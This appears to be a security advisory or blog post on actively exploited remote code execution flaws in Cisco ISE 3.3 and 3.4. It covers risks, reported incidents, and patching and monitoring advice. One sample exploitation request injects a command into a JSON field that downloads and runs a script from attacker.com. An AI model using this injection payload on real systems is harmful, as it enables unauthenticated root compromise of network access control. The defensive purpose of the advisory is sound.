Cisco ISE RCE Vulnerabilities Now Under Exploitation

Overview

In July 2025, Cisco issued an urgent update to its security advisory confirming that multiple critical remote code execution (RCE) vulnerabilities in Identity Services Engine (ISE) are being actively exploited in the wild. These flaws affect ISE versions 3.3 and 3.4, and are considered maximum-severity with CVSS scores of 10.0.

ISE serves as the centralized network access control system for enterprise networks, making it a highly privileged and sensitive platform. If compromised, attackers can potentially manipulate or override core authentication, authorization, and accounting (AAA) mechanisms across the entire environment.

How It Works

Three CVEs have been confirmed as actively exploited, each affecting Cisco ISE’s pre-authentication APIs and file handling:

CVE-2025-20281 & CVE-2025-20337 – API Input Validation Failures

These two vulnerabilities stem from insecure input validation on pre-authentication REST APIs exposed by ISE. A specially crafted request—requiring no authentication—can trigger command injection, allowing the attacker to execute arbitrary code as root.

The vulnerable endpoints may include:

/admin/API/v1/system/logs
/api/v1/devices/register

CVE-2025-20282 – Arbitrary File Upload in ISE 3.4

Exclusive to ISE 3.4, this flaw allows unauthenticated file uploads to sensitive paths within the server’s filesystem, bypassing MIME type checks and leveraging weak directory traversal protections.

Sample exploitation request:

POST /api/v1/system/logs
Content-Type: application/json

{
  "logLevel": "debug && wget http://attacker.com/x.sh -O /tmp/x.sh && chmod +x /tmp/x.sh && /tmp/x.sh"
}

Risks

The implications of these exploits are severe:

  • Complete system takeover: The attacker gains root-level access to the ISE system.
  • Compromise of network access control: Rogue devices may gain access or AAA policies may be altered.
  • Lateral movement: Attackers can pivot to AD, VPNs, and log servers.
  • Stealth and persistence: ISE’s role in NAC may obscure attack traces.

Since ISE is often deployed in protected zones, traditional EDR coverage is limited, making forensic detection difficult.

Real-World Examples

Multiple vendors and SOCs have observed exploitation:

  • Secure-ISS reported scans for /api/v1/devices.
  • A European healthcare MSP saw attackers deploy Cobalt Strike via ISE exploits.
  • A university IT team discovered ISE was abused to allow malware-laden BYOD laptops on core VLANs.

Recommendations

1. Patch Immediately

Upgrade to:

  • ISE 3.3 → Patch 7
  • ISE 3.4 → Patch 2

2. Isolate API Interfaces

Ensure API and admin interfaces are not internet-exposed. Restrict access via firewall or reverse proxy ACLs.

3. Monitor for Exploitation Artifacts

  • Unusual POSTs to vulnerable endpoints
  • Suspicious file writes in /tmp, /var/log, /opt
  • Command execution logs for shell activity or outbound calls

4. Enable EDR and File Integrity Monitoring

If agents aren't supported, forward logs to SIEM and monitor filesystem activity on critical paths.

5. Rotate Credentials and Secrets

If compromise is suspected, revoke device certs, update RADIUS secrets, and audit AAA logs.

Final Thoughts

Cisco ISE, while often overlooked, is a high-value target. These zero-day RCE flaws show why NAC infrastructure must be treated with the same urgency as domain controllers or perimeter firewalls.

Delaying patches is not an option. Unauthenticated, root-level RCE is the definition of critical. Patch now, monitor deeply, and restrict access aggressively.